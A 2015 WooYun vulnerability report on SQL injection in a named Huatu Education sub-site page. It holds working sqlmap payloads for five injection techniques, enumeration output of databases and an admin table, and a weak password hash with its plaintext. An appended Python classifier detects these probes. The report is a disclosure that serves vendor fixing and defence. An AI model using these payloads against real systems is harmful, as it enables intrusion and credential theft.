
Vulnerability summary

Defect ID: wooyun-2015-0123492

Title: SQL injection on a Huatu Education (华图教育) sub-site (multiple databases affected)

Vendor: Huatu Education (华图教育)

Author: 路人甲

Submitted: 2015-06-29 16:41

Fixed: 2015-08-14 10:58

Published: 2015-08-14 10:58

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-06-29: Details sent to the vendor; awaiting vendor handling
2015-06-30: Vendor has confirmed; details disclosed to the vendor only
2015-07-10: Details disclosed to core white hats and experts in related fields
2015-07-20: Details disclosed to regular white hats
2015-07-30: Details disclosed to intern white hats
2015-08-14: Details disclosed to the public

Brief description:

As titled (supplementary data provided as proof).

Detailed description:

Time-based blind SQL injection. Multiple databases are affected, and many accounts use weak passwords; for example, the stored password hash 49ba59abbe56e057 corresponds to the password 123456.

SQL injection point:

http://1dui1.huatu.com/ydyzs.php
POST parameters: tag=1&title=54O5b8On
The title parameter is vulnerable to time-based blind injection.



Proof of vulnerability:

sqlmap identified the following injection points with a total of 59 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: tag=1&title=' AND 1236=1236 AND 'Zqsp' LIKE 'Zqsp
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: tag=1&title=' AND 8753=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(98)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (8753=8753) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(107)+CHAR(113))) AND 'SLhA' LIKE 'SLhA
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: tag=1&title=';WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: tag=1&title=' WAITFOR DELAY '0:0:5'--
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: tag=1&title=' UNION ALL SELECT NULL,CHAR(113)+CHAR(107)+CHAR(98)+CHAR(107)+CHAR(113)+CHAR(117)+CHAR(80)+CHAR(109)+CHAR(115)+CHAR(110)+CHAR(106)+CHAR(107)+CHAR(97)+CHAR(68)+CHAR(120)+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(107)+CHAR(113)--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: Microsoft SQL Server 2000
current user: 'develop'
current database: 'HTOLMain'
current user is DBA: False
available databases [11]:
[*] HTOL_Card
[*] HTOL_DaSai
[*] HTOL_Study
[*] HTOLMain
[*] lumigent
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
Database: HTOLMain
[248 tables]
Database: HTOLMain
Table: Cl_Admin
[16 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| AddUser | nvarchar |
| arrClassCheck | ntext |
| arrClassInput | ntext |
| arrClassMaster | ntext |
| department | nvarchar |
| flag | tinyint |
| ID | int |
| LastLoginIP | nvarchar |
| LastLoginTime | datetime |
| LastLogoutTime | datetime |
| LoginTimes | int |
| Password | nvarchar |
| Purview | ntext |
| Purview_Other | ntext |
| realname | nvarchar |
| UserName | nvarchar |
+----------------+----------+
Database: HTOLMain
Table: Cl_Admin
[145 entries]
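The sqlmap output above confirms five injection techniques against the title parameter of ydyzs.php. As an added example that is not part of the original report or of sqlmap, the following Python classifier shows how a log reviewer or WAF rule author can tell those probe patterns apart from a normal request to the same endpoint; the sample bodies are constructed from the payloads shown above (the error-based one shortened), and the function and rule names are my own.

```python
import re
from urllib.parse import parse_qs, urlencode

# Rules for the MS SQL Server syntax seen in the report's sqlmap output,
# ordered from most to least specific; the first match names the technique.
RULES = [
    ("stacked queries", re.compile(r";\s*(waitfor|exec|insert|update|delete|drop)\b", re.I)),
    ("time-based blind", re.compile(r"\bwaitfor\s+delay\b", re.I)),
    ("union query", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("error-based", re.compile(r"\bconvert\s*\(\s*int\s*,", re.I)),
    ("boolean-based blind", re.compile(r"\b(and|or)\s+(\d+)\s*=\s*\2\b", re.I)),
]
BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.S)

def normalize(value):
    """Drop inline comments and collapse whitespace, so spacing tricks such as
    WAITFOR/**/DELAY cannot hide a keyword from the rules."""
    return re.sub(r"\s+", " ", BLOCK_COMMENT.sub(" ", value))

def classify(body, param="title"):
    """Decode a form-encoded POST body, inspect the named field and return the
    technique of the first matching rule, or None when the value looks benign."""
    for raw in parse_qs(body, keep_blank_values=True).get(param, []):
        value = normalize(raw)
        for technique, rule in RULES:
            if rule.search(value):
                return technique
    return None

def tally(bodies):
    """Count techniques across many request bodies; benign bodies are skipped."""
    counts = {}
    for body in bodies:
        technique = classify(body)
        if technique:
            counts[technique] = counts.get(technique, 0) + 1
    return counts

# Constructed sample: the report's payloads (error-based one shortened) plus the
# ordinary value from its original request, form-encoded as sent on the wire.
SAMPLE_BODIES = [urlencode({"tag": "1", "title": t}) for t in [
    "54O5b8On",
    "' AND 1236=1236 AND 'Zqsp' LIKE 'Zqsp",
    "' AND 8753=CONVERT(INT,(SELECT CHAR(113)+CHAR(107))) AND 'SLhA' LIKE 'SLhA",
    "';WAITFOR DELAY '0:0:5'--",
    "' WAITFOR DELAY '0:0:5'--",
    "' UNION ALL SELECT NULL,CHAR(113)+CHAR(107)--",
]]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(classify(body) or "benign", "<-", body[:60])
    print(tally(SAMPLE_BODIES))
```

The classifier is meant for post-decoding request bodies; it is a triage aid for reviewing traffic to the affected endpoint, not a substitute for fixing the query itself.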

Remediation:

Filter the input parameters.

Copyright notice: when reposting, please credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2015-06-30 10:57

Vendor reply:

Being handled, thank you.

Latest status:

None yet

